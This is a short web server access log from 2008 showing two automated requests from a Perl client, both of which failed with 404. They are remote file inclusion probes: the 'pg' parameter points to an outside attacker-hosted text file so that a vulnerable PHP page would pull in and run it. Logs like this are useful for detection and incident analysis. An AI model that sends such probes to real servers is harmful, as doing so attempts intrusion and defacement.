62.193.224.20 - - [25/Mar/2008:06:33:25 -0700] "GET /index1.php?pg=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:33:25 -0700] "GET /logs/index1.php?pg=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
